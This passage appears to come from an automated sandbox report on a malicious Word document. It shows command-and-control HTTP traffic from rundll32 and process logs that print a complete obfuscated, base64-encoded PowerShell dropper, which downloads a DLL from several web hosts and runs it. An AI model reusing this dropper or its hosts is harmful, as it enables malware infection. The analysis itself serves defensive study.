                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.210302114 CET66INData Raw: c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16
                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.210341930 CET67INData Raw: 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00
                                                                    Data Ascii: E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.210386038 CET69INData Raw: f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00 c7 45 f8 2a 16 00 00
                                                                    Data Ascii: *E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*E*
                                                                    Jan 24, 2021 18:03:31.343626976 CET70INData Raw: c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05 70 60 00 10 2b 02 00 00 c7 05
                                                                    Data Ascii: p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p`+p


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    4192.168.2.2249174195.159.28.2308080C:\Windows\SysWOW64\rundll32.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Jan 24, 2021 18:04:59.722896099 CET419OUTPOST /qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/ HTTP/1.1
                                                                    DNT: 0
                                                                    Referer: 195.159.28.230/qx5bd9nftkeamx9go/tfd1n5eo46apeeemf0b/mj4150jmaay6lk5516s/fvisgp1w/jgoi7zg/0vfpwrsi4wovyhl/
                                                                    Content-Type: multipart/form-data; boundary=---------------------iENsjsNk0B6FOMTAZLRMt
                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                    Host: 195.159.28.230:8080
                                                                    Content-Length: 5492
                                                                    Connection: Keep-Alive
                                                                    Cache-Control: no-cache
                                                                    Jan 24, 2021 18:04:59.975095987 CET427INHTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Sun, 24 Jan 2021 17:04:59 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Vary: Accept-Encoding
                                                                    Data Raw: 38 38 34 0d 0a b5 23 c7 b5 3b 8f d0 b4 b3 08 7d ad 2c be 3e ca 52 3b 98 d7 2a 9a c5 6e 2d 06 0c 85 b2 2e 7d f6 50 22 a1 5d 74 e2 f1 67 8e f3 a7 e4 71 52 21 74 83 e9 1b a7 be 87 37 bb 19 77 21 2b 0f 9d 2e f7 e4 aa 97 55 78 3b bd fd de 55 d5 ad 70 ea 91 0f f9 e5 52 f7 56 0c 4e ac 31 f9 34 63 f0 cf 8a 86 15 ca 1d 8b 05 45 bf ef 0d 27 53 a4 6e 71 43 ab e5 30 24 73 22 16 7c 2e 57 a3 78 47 4a 1e 2d 8f 4e a9 04 04 99 a9 95 2a b3 8f c4 a5 3f df 97 5f ce 58 2e b6 93 ba e7 c5 32 93 b2 47 12 7c 4c f8 ec 25 6f d7 88 0b 7c 68 b6 b5 6a db c2 f0 c0 d4 90 f5 7c 5e 53 df 1d 71 a9 0f 58 d6 57 ee 59 f1 41 d2 13 d1 9f b6 7e 2a 3d 39 b2 9d 43 56 4b 97 4c c8 e7 04 2d 44 84 f8 cd 00 77 d2 7c d2 16 0d 94 87 a4 66 95 5c 4e e7 2a d7 3b 0a f1 b1 a5 a0 f8 74 42 d7 23 bc 2e 71 4a 1d 71 5c 44 a0 71 e1 54 89 8b 29 ec c2 e4 74 16 66 bd dc 89 42 46 32 06 cc 47 7d b8 d4 fa d1 f3 af cb 39 45 fa 94 ef 68 64 6f d0 c1 0a 15 e7 31 63 7d 79 e2 1e 7b cf ce e2 6b 99 03 c2 bb 6a f1 95 d0 9a c6 d6 8b 6b 88 63 70 50 ec 2b 02 4b be c9 29 e0 35 46 cc a1 0d 3d 21 9c b8 4c fd 27 0b 6d d5 cc 56 48 5e 84 aa f7 4f 02 ee eb 90 2a e5 e2 17 2e 45 25 44 74 11 a8 36 54 99 f9 78 8f f7 a4 b7 f3 72 d0 2e 06 15 eb ae e3 f7 21 b1 19 b3 c7 9a 48 2b ac 21 02 58 d0 c8 80 c3 86 d4 0c b1 be a0 56 a8 f8 5f a7 e0 3b e8 ed 00 31 01 fa cd e8 15 13 51 19 06 f7 b3 c4 bf 3c 97 f4 49 ef d0 73 c3 e1 c5 e9 c5 3e a0 c3 ce f8 34 a6 50 38 d1 6d 80 bd 0f d0 af dd 9d 78 f1 43 b3 7e 90 af 48 b0 8a e2 08 60 2d eb 8c e6 98 6f 0f 4e 93 79 a5 1b 43 07 e8 0d 6e 95 b2 f2 c7 cd 81 0a 5a 20 db 50 f9 36 d8 2e 22 7e 0c 62 b3 6f c1 d5 43 ce 79 eb 14 d4 a0 87 e0 8f 30 d4 28 b9 fd ab 34 3d b5 71 7b 7a 38 4a d0 a8 a1 78 8e 8a 40 50 3e 6c 5f ca 71 09 31 a4 0e 55 88 63 83 93 d7 0b 14 f6 1a 96 83 f5 75 10 a9 c3 ad 63 b9 47 f3 86 e4 eb be 0f ad 96 8b d7 38 ff 51 85 49 d4 e5 65 ec 0f 5b 1c d8 f0 fe 75 94 0f df f3 b0 b2 81 6f 8d 8e 2b 00 f7 1e 6b 35 04 37 01 71 b8 04 c6 5d 05 45 b3 09 3d b3 c5 40 d3 17 03 17 5a 9f 4d 9b 4e e2 c1 09 86 ac e9 65 3d fa 97 8a dd 65 db 88 a8 5e 84 9e bd ee 34 10 6a a2 b8 b6 dc 9f 37 4c f0 ea b3 a1 b6 03 99 8d 36 13 e0 58 8e 53 0b 2d e5 64 f0 6e 82 f2 77 66 50 eb d3 6e ea 46 7d 15 54 56 f0 ef df da 3e 20 a3 71 ca 88 13 12 f3 03 3c fc 85 84 d0 0f d0 1f d5 cf 8e e9 dd 30 dc ef 8b 43 d1 10 04 64 64 78 00 1a 41 d5 12 98 5c 46 23 8f 25 04 ac 46 ab 24 51 cf 24 2f e9 78 c4 71 59 1c 42 dc 8c 83 65 b1 21 1f 9e 2a 05 4f a0 f4 19 a0 ac b0 c1 65 10 0a 88 c8 5c 42 5b 67 af d7 0a 11 ee 27 26 e6 09 d1 87 34 36 44 98 a5 51 dc 75 1d bd 4e a1 d0 7d fd 69 fa a2 b7 7c cb 41 90 4c 54 42 05 0c a7 2d 63 a8 76 fc 13 80 42 ef 48 39 87 b6 9f 3a 1f 24 92 24 33 33 81 22 ce ca 73 ee d3 b7 50 92 bf 13 ad 8d 82 63 e5 14 1a ef 14 a2 a3 66 64 e4 c7 b2 a9 2d 41 4a f8 bb 37 ab 9f 8b b7 99 ea 29 84 0c f6 e4 f2 25 84 44 5b 79 6c 4a 10 4a 30 ad cf 04 ce 2b 06 2a dd 8d 28 65 19 27 c6 f8 a5 0e 39 a2 43 30 71 86 af 0b 7d b4 d8 37 6c cc 23 32 ae 03 8c 4c 90 1f 2e 65 ea 41 d1 a7 e2 98 cc 83 44 24 c5 84 63 fa f2 c7 a8 d4 16 4c b2 81 80 5a 43 95 4c a6 9c b2 fc e3 8f 27 0f 39 72 5c 72 38 9e a9 04 02 2c 8b 1a cd 21 18 4c 13 dd c9 93 7d aa 3b 63 cf 6e 0a 18 91 9c cc 4a 27 b6 f4 51 5d fb 23 97 c5 fa cb b9 d8 a3 12 94 8e bc cf 8a 3c 1f a1 a7 57 8b e9 eb 0e e6 14 35 18 1b 04 39 31 77 30 11 ce 35 64 26 2a da 54 20 29 7b b0 d3 dd c1 fd 0f 5e 07 86 f4 14 49 b3 24 ae a2 b5 f9 d1 58 e6 bb 29 8a 0b fb 9f 88 d3 84 e1 4f 99 0b 76 3a 83 60 a8 20 e9 6b 87 2f 1a c2 3e cc a8 1e ab 12 5e 15 7f 5b 15 99 c8 95 a2 5f 35 e3 6a ce f8
                                                                    Data Ascii: 884#;},>R;*n-.}P"]tgqR!t7w!+.Ux;UpRVN14cE'SnqC0$s"|.WxGJ-N*?_X.2G|L%o|hj|^SqXWYA~*=9CVKL-Dw|f\N*;tB#.qJq\DqT)tfBF2G}9Ehdo1c}y{kjkcpP+K)5F=!L'mVH^O*.E%Dt6Txr.!H+!XV_;1Q<Is>4P8mxC~H`-oNyCnZ P6."~boCy0(4=q{z8Jx@P>l_q1UcucG8QIe[uo+k57q]E=@ZMNe=e^4j7L6XS-dnwfPnF}TV> q<0CddxA\F#%F$Q$/xqYBe!*Oe\B[g'&46DQuN}i|ALTB-cvBH9:$$33"sPcfd-AJ7)%D[ylJJ0+*(e'9C0q}7l#2L.eAD$cLZCL'9r\r8,!L};cnJ'Q]#<W591w05d&*T ){^I$X)Ov:` k/>^[_5j


                                                                    Code Manipulations

                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    Analysis Process: WINWORD.EXE PID: 2268 Parent PID: 584

                                                                    General

                                                                    Start time:18:03:33
                                                                    Start date:24/01/2021
                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
                                                                    Imagebase:0x13f480000
                                                                    File size:1424032 bytes
                                                                    MD5 hash:95C38D04597050285A18F66039EDB456
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Chronological Activities

                                                                    Analysis Process: cmd.exe PID: 1552 Parent PID: 1220

                                                                    General

                                                                    Start time:18:03:35
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\cmd.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:cmd cmd /c m^s^g %username% /v Wo^rd exp^erien^ced an er^ror tryi^ng to op^en th^e fi^le. & p^owe^rs^he^ll^ -w hi^dd^en -^e^nc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwAgACQASgByAG4AegBtAGsAcwAgACsAIAAkAFUAXwAyAEQAKQA7ACQAUQA5ADkAUAA9ACgAJwBGADgAJwArACcAOABTACcAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQATQB6AHUAYwBoAGoANgAgAGkAbgAgACQAWABhAHAAMQBsAG0AYQApAHsAdAByAHkAewAoAC4AKAAnAE4AJwArACcAZQB3AC0ATwBiACcAKwAnAGoAZQBjACcAKwAnAHQAJwApACAAcwB5AFMAVABlAE0ALgBuAGUAdAAuAFcARQBCAGMAbABpAGUATgB0ACkALgAiAGQATwBXAGAATgBMAE8AYQBEAGYAYABpAGAATABFACIAKAAkAE0AegB1AGMAaABqADYALAAgACQAWABkAG4ANQB4AGgAZwApADsAJABDADUANwBCAD0AKAAnAEMAMgAnACsAJwA5AEMAJwApADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0AGUAJwArACcAbQAnACkAIAAkAFgAZABuADUAeABoAGcAKQAuACIAbABlAE4AYABHAGAAVABoACIAIAAtAGcAZQAgADQANwA2ADYAOQApACAAewAuACgAJwByAHUAJwArACcAbgBkAGwAbAAzADIAJwApACAAJABYAGQAbgA1AHgAaABnACwAKAAoACcAQQBuACcAKwAnAHkAUwB0ACcAKQArACcAcgAnACsAKAAnAGkAbgAnACsAJwBnACcAKQApAC4AIgB0AE8AUwBgAFQAcgBJAGAATgBHACIAKAApADsAJABNADMAOQBTAD0AKAAnAFEAJwArACgAJwA3ACcAKwAnADYATgAnACkAKQA7AGIAcgBlAGEAawA7ACQAWAA1ADEAWAA9ACgAJwBLADEAJwArACcANgBGACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQARwA0AF8ARgA9ACgAJwBWADIAJwArACcAMQBYACcAKQA=
                                                                    Imagebase:0x4a850000
                                                                    File size:345088 bytes
                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: msg.exe PID: 2556 Parent PID: 1552

                                                                    General

                                                                    Start time:18:03:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\msg.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:msg user /v Word experienced an error trying to open the file.
                                                                    Imagebase:0xff320000
                                                                    File size:26112 bytes
                                                                    MD5 hash:2214979661E779C3E3C33D4F14E6F3AC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate

                                                                    Chronological Activities

                                                                    Analysis Process: powershell.exe PID: 2452 Parent PID: 1552

                                                                    General

                                                                    Start time:18:03:36
                                                                    Start date:24/01/2021
                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:powershell -w hidden -enc IABTAGUAVAAtAHYAQQBSAGkAYQBCAEwAZQAgACgAIgBUADQAIgArACIASwBkADYAIgApACAAKAAgAFsAVAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADQAfQB7ADEAfQAiACAALQBGACAAJwByAGUAJwAsACcAcgBZACcALAAnAFMAWQAnACwAJwBzAFQAZQAnACwAJwBjAHQATwAnACwAJwBtAC4ASQBvAC4ARABJACcAKQAgACkAOwAgACAAIAAgAFMARQB0ACAAIAA0ADIAOAAgACgAIAAgAFsAVABZAHAAZQBdACgAIgB7ADMAfQB7ADcAfQB7ADAAfQB7ADUAfQB7ADYAfQB7ADIAfQB7ADQAfQB7ADgAfQB7ADEAfQAiAC0AZgAnAEUATQAuAG4ARQBUAC4AJwAsACcAZQByACcALAAnAHQAJwAsACcAUwBZAHMAJwAsACcATQAnACwAJwBzAEUAUgBWAGkAQwBFACcALAAnAFAAbwBJAE4AJwAsACcAdAAnACwAJwBhAE4AYQBnACcAKQApACAAIAA7ACAAIAAkAEoAcgBuAHoAbQBrAHMAPQAkAEEAMQA2AEwAIAArACAAWwBjAGgAYQByAF0AKAAzADMAKQAgACsAIAAkAFkAMQAxAEYAOwAkAE0AMgAwAE0APQAoACcATwAxACcAKwAnADgAVwAnACkAOwAgACAAKABJAHQAZQBNACAAKAAiAFYAQQByAEkAQQBCAGwARQA6AFQANABrACIAKwAiAEQAIgArACIANgAiACkAIAAgACkALgB2AEEAbABVAGUAOgA6ACIAQwByAGUAQQBUAGAARQBkAEkAUgBlAEMAdABgAE8AcgB5ACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwAH0AJwArACcAUwBuAHUAdgB3ADIAdwB7ADAAJwArACcAfQBWACcAKwAnADQANgAnACsAJwA1ADEAcAB6AHsAMAAnACsAJwB9ACcAKQAgAC0ARgBbAEMASABhAHIAXQA5ADIAKQApADsAJABFADIAMABWAD0AKAAoACcAQgAxACcAKwAnADMAJwApACsAJwBBACcAKQA7ACAAIAAkADQAMgA4ADoAOgAiAHMARQBjAHUAYABSAGAAaQB0AHkAUABgAFIAYABPAFQAbwBjAG8AbAAiACAAPQAgACgAKAAnAFQAJwArACcAbABzADEAJwApACsAJwAyACcAKQA7ACQARQBfADkAUQA9ACgAKAAnAEcAJwArACcAOQAxACcAKQArACcATgAnACkAOwAkAFcAcwB4AHcANQAyAHoAIAA9ACAAKAAnAEgAJwArACgAJwA2ADQAJwArACcAQwAnACkAKQA7ACQATAAwADQATgA9ACgAJwBWACcAKwAoACcAMQA2ACcAKwAnAEYAJwApACkAOwAkAFgAZABuADUAeABoAGcAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAfQBTAG4AdQB2AHcAJwArACcAMgB3AHsAMAB9AFYAJwArACgAJwA0ADYANQAnACsAJwAxAHAAJwApACsAJwB6AHsAMAB9ACcAKQAtAEYAWwBDAEgAYQByAF0AOQAyACkAKwAkAFcAcwB4AHcANQAyAHoAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFgAMgA4AEcAPQAoACcAVwAwACcAKwAnADEARQAnACkAOwAkAE8AMwAzADgAXwA3ADcAPQAnAGgAJwAgACsAIAAnAHQAdAAnACAAKwAgACcAcAAnADsAJABYAGEAcAAxAGwAbQBhAD0AKAAnAHgAJwArACcAIAAnACsAKAAnAFsAJwArACcAIABzAGgAIABiADoAJwArACcALwAvACcAKQArACgAJwBjAG8AJwArACcAdwBvAHIAJwApACsAKAAnAGsAJwArACcAaQBuAGcAcABsACcAKQArACcAdQBzACcAKwAnAC4AJwArACgAJwBlAHMAJwArACcALwB3ACcAKQArACgAJwBwAC0AYQAnACsAJwBkAG0AaQBuACcAKwAnAC8ARgB4AG0AJwApACsAKAAnAE0ARQAnACsAJwAvACcAKQArACcAIQAnACsAJwB4ACcAKwAnACAAWwAnACsAJwAgACcAKwAnAHMAaAAnACsAKAAnACAAYgAnACsAJwA6ACcAKwAnAC8ALwBzAGkAbABrACcAKwAnAG8AJwApACsAKAAnAG4AYgB1ACcAKwAnAHMAaQAnACkAKwAnAG4AZQAnACsAKAAnAHMAcwAuACcAKwAnAG0AJwApACsAJwBhACcAKwAoACcAdAAnACsAJwByAGkAeABpAG4AJwArACcAZgBvAHQAZQBjACcAKwAnAGgAcwBvAGwAdQB0AGkAJwApACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAnAG0AJwArACgAJwAvACcAKwAnAGoAcwAnACkAKwAoACcALwAnACsAJwBxADIANgAnACkAKwAoACcALwAhACcAKwAnAHgAIABbACcAKQArACcAIAAnACsAJwBzAGgAJwArACgAJwAgAGIAJwArACcAcwA6AC8AJwApACsAJwAvACcAKwAoACcAYgBiAGoAJwArACcAdQAnACkAKwAoACcAZwB1ACcAKwAnAGUAdABlAHIAJwArACcAaQBhACcAKQArACgAJwAuAGMAbwBtACcAKwAnAC8AcwA2AGsAJwApACsAKAAnAHMAYwAnACsAJwB4ACcAKQArACcALwAnACsAJwBaACcAKwAoACcALwAhACcAKwAnAHgAJwApACsAJwAgAFsAJwArACcAIAAnACsAJwBzACcAKwAoACcAaAAnACsAJwAgACcAKwAnAGIAcwA6AC8AJwApACsAJwAvACcAKwAoACcAdwB3ACcAKwAnAHcAJwApACsAJwAuAGIAJwArACcAaQAnACsAJwBtACcAKwAnAGMAZQAnACsAJwBwACcAKwAnAHQAaQAnACsAKAAnAG8AbgAuAGMAJwArACcAbwAnACkAKwAoACcAbQAvAHcAJwArACcAcAAtAGEAZABtAGkAbgAvAHMASAB5ACcAKwAnADUAdAAvACcAKwAnACEAeAAgAFsAJwArACcAIAAnACsAJwBzACcAKwAnAGgAIABiADoALwAvAGEAcgBtAGEAawAnACkAKwAnAG8AbgAnACsAKAAnAGEAcgAnACsAJwBtAHMALgAnACsAJwBjACcAKQArACcAbwAnACsAJwBtAC8AJwArACcAdwAnACsAKAAnAHAALQBpACcAKwAnAG4AJwApACsAKAAnAGMAbAB1ACcAKwAnAGQAZQAnACsAJwBzAC8AZgB6AC8AJwArACcAIQAnACkAKwAnAHgAIAAnACsAKAAnAFsAJwArACcAIABzACcAKQArACgAJwBoACcAKwAnACAAYgA6AC8AJwArACcALwBhAGwAJwApACsAKAAnAHUAJwArACcAZwAnACsAJwByAGEAbQBhAC4AYwAnACkAKwAoACcAbwBtACcAKwAnAC4AJwApACsAJwBtACcAKwAnAHgAJwArACcALwAnACsAJwB0AC8AJwArACgAJwAyAC8AIQB4ACcAKwAnACAAJwArACcAWwAgAHMAaAAnACkAKwAoACcAIABiACcAKwAnADoAJwApACsAKAAnAC8AJwArACcALwBoAG8AJwApACsAJwBtAGUAJwArACgAJwBjAGEAcwBzAC4AYwBvACcAKwAnAG0ALwAnACsAJwB3AHAAJwApACsAKAAnAC0AYwAnACsAJwBvAG4AdAAnACkAKwAoACcAZQBuAHQAJwArACcALwBpAEYAJwArACcALwAnACkAKQAuACIAUgBlAGAAUABsAGAAQQBDAGUAIgAoACgAJwB4ACAAJwArACgAJwBbACAAcwBoACcAKwAnACAAJwApACsAJwBiACcAKQAsACgAWwBhAHIAcgBhAHkAXQAoACcAbgBqACcALAAnAHQAcgAnACkALAAnAHkAagAnACwAJwBzAGMAJwAsACQATwAzADMAOABfADcANwAsACcAdwBkACcAKQBbADMAXQApAC4AIgBTAHAAYABsAEkAdAAiACgAJABPADUAMwBVACAAKwA